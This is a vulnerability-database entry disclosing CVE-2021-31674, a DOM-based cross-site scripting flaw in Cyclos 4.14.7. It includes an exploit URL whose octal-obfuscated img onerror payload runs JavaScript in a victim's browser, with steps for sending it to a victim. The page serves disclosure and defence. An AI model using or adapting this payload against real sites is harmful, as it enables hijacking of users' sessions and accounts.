Lucene search
Tin Pham1337DAY-ID-37710HistoryMay 12, 2022 - 12:00 a.m.
Cyclos 4.14.7 - DOM Based Cross-Site Scripting Vulnerability
2022-05-1200:00:00
Tin Pham
0day.today
188
0.003 Low
EPSS
Percentile
70.8%
# Exploit Title: Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)
# Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services
# Vendor Homepage: https://www.cyclos.org/
# Version: Cyclos 4.14.7 (and prior)
# Tested on: Ubuntu
# CVE : CVE-2021-31674
# Description:
Cyclos 4 PRO 4.14.7 and before does not validate user input at error inform, which allows remote unauthenticated attacker to execute javascript code via undefined enum.
# Steps to reproduce:
An attacker sends a draft URL
[IP]/#users.users.public-registrationxx%3Cimg%20src=x%20onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)%22%3E to victim.
When a victim opens the URL, XSS will be triggered.
Related
prion
prion
Input validation
2022-05-02 00:15:00
cve
cve
CVE-2021-31674
2022-05-02 00:15:08
cvelist
cvelist
CVE-2021-31674
2022-05-01 23:06:02
cnvd
cnvd
Cyclos 4 PRO Cross-Site Scripting Vulnerability (CNVD-2022-77956)
2022-05-07 00:00:00
nvd
nvd
CVE-2021-31674
2022-05-02 00:15:08
exploitdb
exploitdb
Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)
2022-05-11 00:00:00
packetstorm
packetstorm
Cyclos 4.14.7 Cross Site Scripting
2022-05-11 00:00:00